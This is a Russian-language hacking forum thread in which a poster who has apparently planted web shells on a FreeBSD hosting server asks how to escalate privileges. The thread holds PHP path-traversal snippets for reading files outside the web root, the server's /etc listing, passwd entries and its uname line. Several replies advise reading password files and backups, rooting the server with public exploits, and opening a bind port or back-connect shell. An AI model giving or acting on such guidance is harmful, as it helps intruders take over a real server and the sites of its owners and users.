Ребята, привет. У меня возник вопросик, я столкнулся с одним сервером на нём стоит FreeBSD, у меня есть доступ к папка вот они .snap
bin
boot
dev
etc
lib
libexec
mnt
proc
rescue
root
sbin
tmp
usr
var
sys
.cshrc
.profile
COPYRIGHT
home
entropy
nonexistent
scripts
lost+found
backup
.contactemail


И чтение файлов, но не всех (на запись не проверял) Посоветуйте, что можно сделать на нём висит около 400 сайтов. Поделюсь если поможете.

etc/shadow глянь на всяк пожарный

А вообще какие у тебя права, подробней о том какая версия и вообще так тебе думаю никто ничего не скажет. Просмотреть содержимое некоторых этих каталогов можно даже на некоторых бесплатных хостингах

вот, для чтения папок я использую <?php
if ($handle = opendir('../../../../'.$tmp)) {
while (false !== ($file = readdir($handle))) {
if ($file != "." && $file != "..") {
echo $file;
}
}
closedir($handle);
}
?>


А для чтения <?
$file=file('../../../../'.$sh); $strings="5000
for($i=0;$i<$strings;$i++)
{
$string.=$file[$i];
}

echo "$string\n";
?>



Вот у меня вопрос как записывать...

нет такой... вот что в etc bluetooth
mail
mtree
pam.d
periodic
gnats
isdn
rc.d
ntp
ssh
ssl
ppp
skel
defaults
group
hosts
hosts.allow
hosts.equiv
hosts.lpd
login.access
login.conf
mac.conf
motd
netconfig
network.subr
wwwacct.conf
relayhostsusers
networks
newsyslog.conf
pf.conf
pf.os
phones
profile
protocols
rc.firewall
rc.firewall6
rc.sendmail
rc.shutdown
rc.subr
remote
rpc
services
shells
sysctl.conf
syslog.conf
usbd.conf
ttys
manpath.config
mail.rc
locate.rc
login.conf.db
netstart
pccard_ether
spwd.db
rc.suspend
rc.resume
master.passwd
nsmb.conf
opieaccess
passwd
termcap
rmt
pwd.db
aliases
dumpdates
make.conf
resolv.conf
fstab
rc.conf.local
rc.firewall.local
nsswitch.conf
host.conf
opiekeys
wall_cmos_clock
localtime
login.conf.orig
sysctl.conf.orig
manpath.config.bak
amd.map
apmd.conf
auth.conf
crontab
csh.cshrc
csh.login
csh.logout
devd.conf
devfs.conf
dhclient.conf
disktab
fbtab
rc
ftpusers
gettytab
init.d
proftpd
rc.conf
localdomains
exim.conf.dist
periodic.conf.local
ports.ignore
inetd.conf
chkserv.d
secondarymx
ipaddrpool-
eximrejects
vmail
trueuserdomains
trueuserowners
demousers
demodomains
interchangedisable
userdomains
ips
make.conf,v
passwd,v
domainips
pure-ftpd
wwwacct.conf.shadow
localaliases
exim.conf.mailman2.dist
exim.conf.mailman2.exiscan.dist
antivirus.exim
exim.pl
exim.conf
exim.key
exim.crt
exim.pl.local
exim
exim.conf.buildtest
namedb
binddisable
newsyslog.conf.orig
relayhosts
syslog.conf.orig
X11
.whostmgrft
cpupdate.conf
name

Я всё просмотрел...

Да не флудите, помогите лучше =) Я могу файлы читать на серваке что значит


# $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin

и вот еще

head 1.1383;
access;
symbols;
locks
root:1.1383; strict;

Mefisto:

Во первых, где ты видишь, что тут выясняют отношения =) ?

Во вторых, прежде чем спрашивать, почитай ФАКи или книжки по пользованию nix подобными системами..сможешь найти ответы на многие вопросы, и научишься чему то новому.
Для того чтобы писать в файлы, у тебя должны быть права для записи, почитай маленькую статью от nerezus'a на этом форуме, там всё описано простым языком...
http://forum.antichat.ru/thread8185.html

И тебе совет, если ты незнаешь в чем предназначение определённых файлов, то не лезь и не пытайса что-то сделать с ними, не утруждай жизнь сис-админу, у него седня праздник =)
Вот почитай немного, вник в смысл, и иследуй...;)

http://freebsd.i1.ru/books.html#rus-books

FreeBSD. Администрирование: искусство достижения равновесия [19.53mb]
[ http://ruinst.net.ru/books/FreeBSD.pdf ]
Пароль на архив: WarezOk.Ru

# $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin

и вот еще

head 1.1383;
access;
symbols;
locks
root:1.1383; strict;

Это значит что пасы храняться в master.passwd, где и должны быть во Фре, а shadow это в Линуксе...

И чтение файлов, но не всех
ну и что?
корневую папку может читать вообще любой пользователь, как и содержимое большинства файлов - ни чего тебе они не дадут, если админ хоть немного знает то, чем занимается

Ни чего ты не сделаешь. Тем более, если так ставишь вопрос.

А про права ненадо писать???? Ты nobody ?
тупость...........>:[


папку password


ДА? Тоесть у тебя там папка, и в ней хеш? Интересно как он туда попал. Я слышал что данные храняться В ФАЙЛАХ А НЕ В ПАПКАХ... Может ты имел ввиду файл passwd =)))

А через что можно посмотреть pwd.db ? Нужен ли он вообще, т.к. хеши хранятся помоему в spwd.db, а он на чтение закрыт. Что можно сделать?

А через что можно посмотреть pwd.db
блокнотом, vi, etc..

Нужен ли он вообще, т.к. хеши хранятся помоему в spwd.db, а он на чтение закрыт. Что можно сделать?

нужен. для восстановления поврежденного файла паролей(хешей).
сделать можно следуещее: прочитать содержимое /etc/shadow (/etc/master.passwd или /etc/security/passwd, /etc/samba/*) , если не получиться - поискать конфиги, бекапы, может в них пасс подходящий к руту.ИЛИ попробовать порутать сплойтом. если нет, пойти с друзьями(девушкой) погулять, отдохнуть и забыть(забить) на это.

thats all.

хм... а можно подробнее про сплойты? Другие варианты не катят.
система:
Server: Apache/1.3.39 (Unix) PHP/4.4.7 with Suhosin-Patch mod_perl/1.29 mod_ssl/2.8.30 OpenSSL/0.9.7e-p1

Ах да, ещё вопрос... на сайте весит два шелла, античат и р57, а ни один не хочет заливать фалы на сервер, в чём проблемма?

нет прав на запись в директорию наверное. или, что мало вероятно, не хватает места

насчет сплойтов. посмари на milw0rm.com

Спасибо! Но чё за фигня, у меня есть доступ к фтп, какой шелл юзать, или как права поднять?

юзай шелл ачата. а права поднимай с помощью сплойтов, если таковые имеються конечно

зы.

[акер"]бастионы фряхи не падут просто так, даже если админ лох

короче, мля, напишы версию БСД и год сборки. полностью строку uname!
попробуй пробиндить порт или бекконект,если не получится, тебе, думаю, там нечего ловить =\

хе хе вот пожалуйста
OS: FreeBSD ns2.leonar.ru 6.2-RELEASE-p8 FreeBSD 6.2-RELEASE-p8 #0: Wed Jan 16 21:13:56 MSK 2008 sysadmin@ns2.leonar.ru:/usr/obj/usr/src/sys/WEBHST i386

Проверь "/backup" - если есть доступ на чтение к бэкапам , копируешь себе архив с содержимым "/etc" далее в master.passwd ищещь юзера у которого есть доступ к ssh.. Думаю, что врятли такое возможно, надейся на кривые руки админа, в реале встечал с открытыми дампами пару серверов только на linux.

Для FreeBSD 6.2 видел гдето сплоит для повышения прав до рута.... Юзай гугл, под эту версию есть сплойт.....
PS ищи чтото по теме временных паролей (сплоит использует багу там какуето)

Для FreeBSD 6.2 видел гдето сплоит для повышения прав до рута.... Юзай гугл, под эту версию есть сплойт.....
PS ищи чтото по теме временных паролей (сплоит использует багу там какуето)
во FreeBSD, права до рута может повысить только член групы wheel. Тут нужно значала до wheel подняться.

ну вот (*
я же говорил. фряха, моя любимая фряха, просто так не сдастся в руки кульхацкеров (*
лучше займись чем нибудь другим (*